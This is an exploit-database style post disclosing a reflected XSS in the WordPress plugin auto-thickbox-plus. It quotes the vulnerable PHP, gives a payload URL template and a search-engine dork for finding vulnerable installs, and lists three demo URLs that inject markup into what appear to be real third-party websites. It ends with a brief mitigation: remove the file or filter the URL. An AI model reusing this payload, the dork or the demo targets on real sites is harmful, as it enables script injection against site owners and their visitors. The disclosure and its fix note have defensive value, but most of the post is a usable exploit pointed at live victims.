facebook facebook twitter rss

WordPress Plugin auto-thickbox-plus XSS

Author: bRpsd , Published: 03-07-2015
################################################
Exploit Title => WordPress Plugin auto-thickbox-plus XSS
Exploit Date => 01 - 07 - 2015
Exploit Author => bRpsd
WP Plugin Download => https://wordpress.org/plugins/auto-thickbox-plus
Dork => inurl:/wp-content/plugins/auto-thickbox-plus/
Skype => vegnox & Mail; cy@live.no
################################################

Bug Type: Reflected XSS !
Vulnerable File: download.min.php

Code ::

//

function force_download($a){if(empty($a)){die('Error: File not specified.');return;}$a=sanitize_url($a);if(!file_exists2($a)){die('Error: File not found. $file='.$a);return;


\\


Payload :
localhost/wp-content/plugins/auto-thickbox-plus/download.min.php?file=[XSS HERE!]


Demo(s):
http://www.mafgiftshop.org/mp/wp-content/plugins/auto-thickbox-plus/download.min.php?file=<h1>test</h1>
http://baliskysports.com/wp-content/plugins/auto-thickbox-plus/download.min.php?file=<h1>test</h1>
http://www.nebigarci.net//wp-content/plugins/auto-thickbox-plus/download.min.php?file=<h1>test</h1>


I know its weak, but it exist.. We have to stay caution.

security updates ? .. unfortunately dosent exist .
But you can remove the file or filter the URL as a solution.

Like us on Facebook :